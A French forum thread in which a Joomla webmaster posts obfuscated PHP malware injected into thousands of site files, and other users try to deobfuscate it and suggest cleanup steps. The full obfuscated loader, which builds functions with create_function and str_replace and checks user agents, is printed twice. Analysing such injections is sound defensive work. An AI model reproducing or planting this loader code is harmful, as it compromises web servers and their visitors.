Decryptage code PHP

Decryptage code PHP - PHP - Programmation

Marsh Posté le 14-06-2016 à 18:29:19    

Bonjour,
 
Un pirate a trouvé une faille sur mon site joomla, et injecte le code suivant dans plusieurs centaines de mes fichiers:
 
<?php $zhdlaryb = '8399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Yq%7/7#@#7/7^#iubq# x5cq% x27jsv%6<C>^#zsfvr# x5cq%7**^#ww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K7V;3q%}U;y]}R;2]},;osvufs} x27;mnui68]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,`TW~ x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M# x7f<u%V x27{ftmfV x7zsfvr# x5cq%)ufttj x22)gj6<ps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fFEBFI,6<*127-UVPFNJU,6<*27-SFpjudovg}x;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0{return chr(ord($n)-1);} #-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]3utjyf`4 x223}!+!<+{e%+*!*+fepdfe{h+{d%)+o^#Y# x5cq% x27Y%6<.msv`ftsbqA7>q%6< x7fw6* x7f_*#fubfstpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:cee:5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]y x64" ))) { $tfjizmc = " x63 162 x65 1x27&6<.fmjgA x27doj%6< x7fw6* x7f_*#fmjgk4`{6~6<tfs%w6< x7fw6* x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuo#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gPnmamv = implode(array_map("mxwrnfp",str_split("%!*#opo#>>}R;msv}.;/#/ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd175L3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]%w6Z6<.4`hA x27pd%6<pd%w6Z6<.3`hA x27pd%6<pd%w6Z6<.2`!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<18:56985:6197g:74985-rr.93OJ`GB)fubfsdXA x27K6< x7fw6*3qjXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fmjix6<C x27&6<*rfs%7-K)27id%6< x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw6*CW& )7gj6<.[A x27&6< x22#)fepmqyfA>2b%!<*qp%-*.%)e4- x24b!>!%yy)#}#-# x24- x24-tusqpt)%z-#:#* x24- x24!>! x24/%tjojneb#-*f%)sfxpmpusut)]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fw6*CW& )7gj6<*K)ftpmd]#-bubE{h%)tpqsut>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqs67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>hA x27pd%6<C x27pd%6|6.7eu{66~67<&w6<*&7-#o273qj%6<*Y%)fnbozcYufhA x272qj%6<^#zsfvr# x5c>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%}&;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}k;oidk!~!<**qp%!-uyfu%)3#/},;#-#}+;%-qp%)54l} x27;%!<*#}_;#)323ldfid3:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy> )eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpm,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88dof.)fepdof./#@#/qp%>5h%!<*::::::-111112*197-2qj%7-K)udfoopdXA x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fw/ x24)% x24- x24y4 x24- x24]y8 x24- x24]26 x24- !**X)ufttj x22)gj!|!*nbsbq%)323ldffujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH# x27rfs%6~6QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHBQi x5c1^W%c!>!%i x5c2^<!Ce*[! 125 x53 105 x52 137 x41 107 x45 116 x54"]); if ((st6]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>! x2tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]342]58,%b:<!%c:>%s: x5c%j:^<!%w` x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>uas," x72 166 x3a 61 x31" )) or (strstr($uas, 156 x61"])))) { $GLOBALS[" x61 156 x75 156 x61"]=1; $uas=strtol72]37y]672]48y]#>s%<#46< x7fw6<*K)ftpmdXA6|7*#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_ x5c}X x2fjizmc("", $fenmamv); $opfzdky();}}x24- x24-!% x24- x24*!|1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w2>j%!|!*#91y]c9y]g2y]#>>*7L6M7]D4]275]D:M8]Df#<%tdz>#L4]224)##-!#~<#/% x24- x24!>!fyqmpef)# x24*<!%t::!>! x24Ypp3)%cB%iN}#-! x!>!(%w:!>! x246767~6<Cw6<pd%w6Z6<.5`hA x27pd%6<pdI#)q%:>:r%:|:**t%)m%=*h%)m%):fmjix:<##:vd}R;*msv%)}.;`UQPMSVD!-id%>:h%:<#64y]552]e7y]#>n%<#372]58y]4of)fepdof`57ftbc x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq% x5cSFWSFT`%}X;!spf;!osvufs}w;* x7f!>> x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)**f x27,*e x27,*d x27,*c x27,*b x27)fepsfebfI{*w%)kVx{**#k#)tutjyf`x x22l:!}ower($_SERVER[" x48 124 x54 120 x5f44#)zbssb!>!ssbnpe_GMFT`))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!g4- x24gps)%j>1<%j=tj{fpg)% x24- x24*<!~! x24/%t2w/ x]y76]277#<!%t2w>#]y74]273]y7%7> x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA x)tutjyf`opjudovg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Z<^2fuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`ms>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c6]24]31#-%tdz*Wsfuvso!%bss x5csboemhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22:pjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gdXk5`{66~6<&w6< x7fw6*CW& )7gj6<*doj%7-C)fepmqnjA `SFTV`QUUI&b%!|!*)323zbek!~!<b% x7f!<Xj<*#k#)usbut`cpV x7f x7f x7f2]47y]252]18y]#>q%<#762]67y]562]38y]572]48y]#>m%:|:*r%:-t%)uqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!}_;gvc%}&;ftmbg} x7" x61 156 x64 162 x6f 151mtf!%b:>%s: x5c%j:.2^4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#mdR6<*id%)dfyfR x27tfs%6<*17-S! x24- x24 x5c%j^ x24- x24tvctus)% x2)utjm!|!*5! x27!hmg%)7fw6*CWtfs%)7gj6<*id%)ftp%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!41 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e"; function mxwrnfp($n) x24<!%ff2!>!bssbz) x24]25 x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO x24/%tmw/ x24)%c*W%eN+#pp2)%zB%z>! x24/%tmw/ x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:759855Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fd4<!%tmw!>!#]y84]275]y83]273if((function_exists(" x6f 142 x5f 163 -#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)# x24#-!##QwTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%t]y38#-!%w:**<" )));$opfzdky = $t)3of:opjudovg<~ x24<!%o:!>! x242178}527}88:}334}4729275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tgoj{hA!osvufs!~<3,j%>j%!*3! x27!hmg%!)!gj!<2,*j%!-#1!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubm@error_reporting(0); $fex74 141 x72 164" ) && (!isset($GLOBALS[" x61 156 x75ut>j%!*9! x27!hmg%)!gj!~<ofmy%GTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR xy]27]28y]#/r%/h%)n%-#+q%V<*#fopoV;hojepdoF.uofuopD#)y<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)#x24<%j,,*!| x24- x24gvodujpo! x24- x24y7 x24- x24*<! x2uhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<*rstr($uas," x6d 163 x69 145" )) or (strstr($STrrEvxNoITCnuF_EtaeRCxECaLPer_RtShbvtjmrvw'; $dkplquqy=explode(chr((477-357)),substr($zhdlaryb,(34636-28710),(184-150))); $jybeug = $dkplquqy[0]($dkplquqy[(6-5)]); $xvhcpp = $dkplquqy[0]($dkplquqy[(14-12)]); if (!function_exists('robqmsyuuh')) { function robqmsyuuh($telwmf, $apabbohiuv,$mmaphcjzy) { $adexbrluw = NULL; for($rvuvgq=0;$rvuvgq<(sizeof($telwmf)/2);$rvuvgq++) { $adexbrluw .= substr($apabbohiuv, $telwmf[($rvuvgq*2)],$telwmf[($rvuvgq*2)+(7-6)]); } return $mmaphcjzy(chr((29-20)),chr((511-419)),$adexbrluw); }; } $ztxsjbc = explode(chr((181-137)),'5126,38,5574,51,2975,64,3745,35,2641,52,5883,43,2931,44,4538,25,846,37,4795,69,540,25,5550,24,1041,48,2755,57,3386,49,1234,53,1815,43,1639,57,1394,64,2496,64,3062,22,2298,57,1363,31,3946,44,1858,45,49,55,391,27,664,54,4303,49,883,57,4734,25,4646,30,469,29,5655,37,1458,68,940,49,4042,38,3474,27,4476,62,3603,66,5484,66,5432,52,1696,63,5625,30,2149,49,4713,21,1287,51,3260,25,4584,62,3990,52,4891,47,1526,28,5834,49,3669,39,2258,40,2107,42,2355,58,4150,49,1617,22,718,60,3780,24,2560,52,4352,38,1903,34,2462,34,1975,21,3535,68,1089,21,1996,44,4199,53,1110,60,5378,54,623,41,4252,51,4390,28,370,21,245,56,1759,56,5714,30,3708,37,148,34,1937,38,498,42,3084,59,5099,27,3918,28,2693,62,2198,60,5692,22,3435,39,3501,34,3039,23,4418,58,5327,51,4864,27,3178,23,4676,37,1554,63,2413,49,5779,55,3866,52,3317,69,4938,22,2612,29,4759,36,4080,37,0,49,4960,60,5230,66,104,44,1338,25,778,68,5020,46,2040,67,989,52,3285,32,1170,64,5066,33,5744,35,565,58,182,63,2812,61,4117,33,3804,62,418,51,4563,21,2873,58,3201,59,301,69,5164,66,5296,31,3143,35'); $uzencuwe = $jybeug("",robqmsyuuh($ztxsjbc,$zhdlaryb,$xvhcpp)); $jybeug=$zhdlaryb; $uzencuwe("" ); $uzencuwe=(395-274); $zhdlaryb=$uzencuwe-1; ?>
 
 
Je voudrais savoir comment décoder ce que fait ce code ? est-ce possible ?
 
En attendant je cherche la faille ?
 
Merci pour vos réponses.

Message cité 1 fois
Message édité par fifye le 15-06-2016 à 12:01:27
Reply

Marsh Posté le 14-06-2016 à 18:29:19   

Reply

Marsh Posté le 14-06-2016 à 18:41:43    

fifye a écrit :

Je voudrais savoir comment décoder ce que fait ce code ? est-ce possible ?


Certainement, mais pas à la main... Il existe des sites qui soit-disant peuvent faire ça (non testé),sinon on peut aussi passer le truc à travers le soft original et voir le résultat (pas avec Firefox, utiliser wget ou autre et un éditeur texte), (edit: NON!) mais ATTENTION, cela peut être très risqué! Attendre d'autres opinions! Je suppose que le résultat est du code HTML pour exécuter un script JS pour tenter d'installer du malware.
EDIT: Ou bien pire... En cherchant "MPT7-NBFSUT" on trouve pas mal de choses similaires. Je pense qu'un nettoyage en profondeur (réinstaller tout) du serveur s'impose... Et je pense que ma proposition d'utiliser php pour décoder est une très mauvaise idée. :o  
 
Tu devrais mettre ce "code" entre balises.
 

Citation :

En attendant je cherche la faille ?


Déjà une mise à jour du/des logiciel(s) est probablement une bonne idée...


Message édité par rat de combat le 14-06-2016 à 23:08:59
Reply

Marsh Posté le 14-06-2016 à 19:21:50    

En regardant ce code de plus près (la curiosité était trop forte :o ) je me dis que c'est vraiment bizarre... Tu es sûr que c'est tout?

 

On se retrouve avec un truc genre

Code :
  1. $array1= ('strstr($STrrEv', 'NoITCnuF_EtaeRC', 'ECa');
  2. $var1 = $array1[0]($array1[1]);


Si je comprends bien c'est un appel de fonction, mais le nom de la fonction est vraiment étrange et $STrrEv n'est défini null part. phpfiddle me sort du coup un "Call to undefined function"... :??:

 

edit: J'ai foutu le truc entier dans phpfiddle - même erreur...

 

EDIT: Je crois que j'ai compris, le mélange entre minuscules et majuscules est vraiment difficile à lire... $STrrEv c'est simplement une fonction php: strrev()!! (le '$' est peut-être en trop). Je vais continuer mes investigations. :)


Message édité par rat de combat le 14-06-2016 à 20:03:06
Reply

Marsh Posté le 15-06-2016 à 12:07:15    

oui c'est tout. ce code est inseré sur la première ligne de plus de 4000 fichiers php sur mon site. c'est toujours le même code et les fichiers choisi sont toujours les mêmes. En effet j'ai un petit plugin qui m'informe lors de la modification de fichiers, et je rétablie une sauvegarde propre à chaque infection le temps de trouver la faille.
 
Mon site est protéger par Aesecure, et je n'avais aucun problème depuis cette attaque. tous mes composants sont à jour.
 
Merci de prendre le temps de jeter un œil, je serais vraiment curieux de comprendre ce que fait ce code.


Message édité par fifye le 15-06-2016 à 12:08:12
Reply

Marsh Posté le 15-06-2016 à 12:21:04    

J'ai pas encore terminé mon "analyse" (et je ne sais pas si je vais continuer / avoir le temps), mais je pense pouvoir affirmer que le code est défectueux et ne peut pas fonctionner dans l'état actuel. Attention, cela ne veut nullement dire que le serveur ne contient pas d'autres cochonneries ou a été utilisé pour des choses malhonnêtes!

 

Je retire ma question si le code est complet, effectivement il l'est, j'avais mal vu. Par contre si tu veux me rendre service tu peux vérifier (avec un éditeur hexa) si le code dans le fichier contient des tabulations (ASCII 0x09). En effet à un moment (mais je ne suis pas encore à cette étape) on retrouve un replace() qui est censé remplacer chr(9) ce qui correspond à une tabulation - mais je n'en vois pas. :??:
edit: Des tabulations ou d'autres caractères non-imprimables, dans ce cas un listing hexa serait très utile.

 

Pour ce qui est de la démarche à suivre pour désinfecter / trouver la faille je laisse ma place à quelqu'un d'autre...


Message édité par rat de combat le 15-06-2016 à 12:22:22
Reply

Marsh Posté le 15-06-2016 à 20:06:46    

Si ça peut aider voici un exemple de fichier infecté:
 
https://drive.google.com/file/d/0B- [...] sp=sharing
 

Reply

Marsh Posté le 16-06-2016 à 02:11:07    

Oh que oui ça peut aider, ça aurait pu m'éviter beaucoup de boulot!! (mais c'est de ma faute, je me suis lancé tête baissé...) Je suis toujours dessus mais je ne garantis pas d'obtenir un résultat ni dans combien de temps, ce "code" contient de multiples couches d'"obfuscation" (c'est quoi le terme français??), c'est vraiment horrible!!
 
Avec ce nouveau fichier je suis moins sûr que le code n'a pas pu tourner, faudrait que je refasse le truc depuis le début pour être sûr qu'il y a toujours un problème de syntaxe.
 
Dire que je voulais me coucher tôt... Bonne nuit!

Reply

Marsh Posté le 16-06-2016 à 07:38:33    

Sur un autre forum où j'ai posé la question, quelqu'un a posté une version plus lisible du code:
 
https://drive.google.com/file/d/0B- [...] sp=sharing

Reply

Marsh Posté le 16-06-2016 à 10:24:31    

Code :
  1. <?php
  2. $zhdlaryb = '8399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Yq%7/7#@#7/7^#iubq# x5cq% x27jsv%6<C>^#zsfvr# x5cq%7**^#ww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K7V;3q%}U;y]}R;2]},;osvufs} x27;mnui68]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,`TW~ x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M# x7f<u%V x27{ftmfV x7zsfvr# x5cq%)ufttj x22)gj6<ps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fFEBFI,6<*127-UVPFNJU,6<*27-SFpjudovg}x;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0{return chr(ord($n)-1);} #-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]3utjyf`4 x223}!+!<+{e%+*!*+fepdfe{h+{d%)+o^#Y# x5cq% x27Y%6<.msv`ftsbqA7>q%6< x7fw6* x7f_*#fubfstpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:cee:5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]y x64" ))) { $tfjizmc = " x63 162 x65 1x27&6<.fmjgA x27doj%6< x7fw6* x7f_*#fmjgk4`{6~6<tfs%w6< x7fw6* x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuo#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gPnmamv = implode(array_map("mxwrnfp",str_split("%!*#opo#>>}R;msv}.;/#/ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd175L3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]%w6Z6<.4`hA x27pd%6<pd%w6Z6<.3`hA x27pd%6<pd%w6Z6<.2`!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<18:56985:6197g:74985-rr.93OJ`GB)fubfsdXA x27K6< x7fw6*3qjXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fmjix6<C x27&6<*rfs%7-K)27id%6< x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw6*CW& )7gj6<.[A x27&6< x22#)fepmqyfA>2b%!<*qp%-*.%)e4- x24b!>!%yy)#}#-# x24- x24-tusqpt)%z-#:#* x24- x24!>! x24/%tjojneb#-*f%)sfxpmpusut)]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fw6*CW& )7gj6<*K)ftpmd]#-bubE{h%)tpqsut>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqs67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>hA x27pd%6<C x27pd%6|6.7eu{66~67<&w6<*&7-#o273qj%6<*Y%)fnbozcYufhA x272qj%6<^#zsfvr# x5c>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%}&;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}k;oidk!~!<**qp%!-uyfu%)3#/},;#-#}+;%-qp%)54l} x27;%!<*#}_;#)323ldfid3:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy> )eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpm,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88dof.)fepdof./#@#/qp%>5h%!<*::::::-111112*197-2qj%7-K)udfoopdXA x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fw/ x24)% x24- x24y4 x24- x24]y8 x24- x24]26 x24- !**X)ufttj x22)gj!|!*nbsbq%)323ldffujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH# x27rfs%6~6QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHBQi x5c1^W%c!>!%i x5c2^<!Ce*[! 125 x53 105 x52 137 x41 107 x45 116 x54"]); if ((st6]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>! x2tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]342]58,%b:<!%c:>%s: x5c%j:^<!%w` x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>uas," x72 166 x3a 61 x31" )) or (strstr($uas, 156 x61"])))) { $GLOBALS[" x61 156 x75 156 x61"]=1; $uas=strtol72]37y]672]48y]#>s%<#46< x7fw6<*K)ftpmdXA6|7*#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_ x5c}X x2fjizmc("", $fenmamv); $opfzdky();}}x24- x24-!% x24- x24*!|1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w2>j%!|!*#91y]c9y]g2y]#>>*7L6M7]D4]275]D:M8]Df#<%tdz>#L4]224)##-!#~<#/% x24- x24!>!fyqmpef)# x24*<!%t::!>! x24Ypp3)%cB%iN}#-! x!>!(%w:!>! x246767~6<Cw6<pd%w6Z6<.5`hA x27pd%6<pdI#)q%:>:r%:|:**t%)m%=*h%)m%):fmjix:<##:vd}R;*msv%)}.;`UQPMSVD!-id%>:h%:<#64y]552]e7y]#>n%<#372]58y]4of)fepdof`57ftbc x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq% x5cSFWSFT`%}X;!spf;!osvufs}w;* x7f!>> x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)**f x27,*e x27,*d x27,*c x27,*b x27)fepsfebfI{*w%)kVx{**#k#)tutjyf`x x22l:!}ower($_SERVER[" x48 124 x54 120 x5f44#)zbssb!>!ssbnpe_GMFT`))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!g4- x24gps)%j>1<%j=tj{fpg)% x24- x24*<!~! x24/%t2w/ x]y76]277#<!%t2w>#]y74]273]y7%7> x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA x)tutjyf`opjudovg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Z<^2fuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`ms>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c6]24]31#-%tdz*Wsfuvso!%bss x5csboemhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22:pjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gdXk5`{66~6<&w6< x7fw6*CW& )7gj6<*doj%7-C)fepmqnjA `SFTV`QUUI&b%!|!*)323zbek!~!<b% x7f!<Xj<*#k#)usbut`cpV x7f x7f x7f2]47y]252]18y]#>q%<#762]67y]562]38y]572]48y]#>m%:|:*r%:-t%)uqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!}_;gvc%}&;ftmbg} x7" x61 156 x64 162 x6f 151mtf!%b:>%s: x5c%j:.2^4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#mdR6<*id%)dfyfR x27tfs%6<*17-S! x24- x24 x5c%j^ x24- x24tvctus)% x2)utjm!|!*5! x27!hmg%)7fw6*CWtfs%)7gj6<*id%)ftp%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!41 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e"; function mxwrnfp($n) x24<!%ff2!>!bssbz) x24]25  x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO x24/%tmw/ x24)%c*W%eN+#pp2)%zB%z>! x24/%tmw/ x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:759855Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fd4<!%tmw!>!#]y84]275]y83]273if((function_exists(" x6f 142 x5f 163 -#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)# x24#-!##QwTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%t]y38#-!%w:**<" )));$opfzdky = $t)3of:opjudovg<~ x24<!%o:!>! x242178}527}88:}334}4729275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tgoj{hA!osvufs!~<3,j%>j%!*3! x27!hmg%!)!gj!<2,*j%!-#1!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubm@error_reporting(0); $fex74 141 x72 164" ) && (!isset($GLOBALS[" x61 156 x75ut>j%!*9! x27!hmg%)!gj!~<ofmy%GTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR xy]27]28y]#/r%/h%)n%-#+q%V<*#fopoV;hojepdoF.uofuopD#)y<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)#x24<%j,,*!| x24- x24gvodujpo! x24- x24y7 x24- x24*<! x2uhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<*rstr($uas," x6d 163 x69 145" )) or (strstr($STrrEvxNoITCnuF_EtaeRCxECaLPer_RtShbvtjmrvw';
  3. $dkplquqy=explode(chr((477-357)),substr($zhdlaryb,(34636-28710),(184-150)));
  4. echo '<h3>Contenu de dkplquqy = </h3><pre>';
  5. var_dump($dkplquqy);
  6. echo '</pre><h3>Contenu de dkplquqy[0] (nom de fonction utilisé pour remplir jybeug & xvhcpp) = </h3><pre>';
  7. var_dump($dkplquqy[0]);
  8. echo '</pre><h3>Contenu de dkplquqy[(6-5)] (parametre envoyé à la fonction pour remplir jybeug) = </h3><pre>';
  9. var_dump($dkplquqy[(6-5)]);
  10. echo '</pre><h3>Contenu de dkplquqy[(14-12)] (parametre envoyé à la fonction pour remplir xvhcpp) = </h3><pre>';
  11. var_dump($dkplquqy[(14-12)]);
  12. echo '</pre>';
  13. ?>


=>

Code :
  1. Contenu de dkplquqy =
  2. array(3) {
  3.   [0]=>
  4.   string(3) "rEv"
  5.   [1]=>
  6.   string(15) "NoITCnuF_EtaeRC"
  7.   [2]=>
  8.   string(14) "ECaLPer_RtShbv"
  9. }
  10. Contenu de dkplquqy[0] (nom de fonction utilisé pour remplir jybeug & xvhcpp) =
  11. string(3) "rEv"
  12. Contenu de dkplquqy[(6-5)] (parametre envoyé à la fonction pour remplir jybeug) =
  13. string(15) "NoITCnuF_EtaeRC"
  14. Contenu de dkplquqy[(14-12)] (parametre envoyé à la fonction pour remplir xvhcpp) =
  15. string(14) "ECaLPer_RtShbv"


 
Mais on ne peut pas aller plus loin dans la désobfuscation vu que la fonction rev(string) n'est pas définis dans ce code, c'est ptet une fonction de Joomla...
 
TIL: Les fonctions php ne sont pas case-sensitive...


---------------
D3
Reply

Marsh Posté le 16-06-2016 à 11:45:17    

fifye a écrit :

Sur un autre forum où j'ai posé la question,


Poster la même question sur plusieurs forums ne se fait pas. :o

 
Citation :

quelqu'un a posté une version plus lisible du code: https://drive.google.com/file/d/0B- [...] sp=sharing


Merci, mais je suis allé plus loin déjà. :lol:  :pt1cable: (Des sites qui formattent du code ce n'est pas ça qui manque...)

 
Citation :

Mais on ne peut pas aller plus loin dans la désobfuscation vu que la fonction rev(string) n'est pas définis dans ce code, c'est ptet une fonction de Joomla...


C'est censé être strrev(), tout ce bloc c'est une façon disons créative de définir (ou plutôt appeller ou je ne sais quel terme est exact) function_create() et str_replace()...


Message édité par rat de combat le 16-06-2016 à 11:46:12
Reply

Marsh Posté le 16-06-2016 à 11:45:17   

Reply

Marsh Posté le 16-06-2016 à 14:16:15    

J'approche du but mais je n'ai pas encore terminé.

 

Pour le TO: D'après quelque sites ce malware peut entrer à travers une faille dans MailPoet, si jamais tu utilises cette chose une mise à jour s'impose...


Message édité par rat de combat le 16-06-2016 à 14:16:24
Reply

Marsh Posté le 16-06-2016 à 14:30:24    

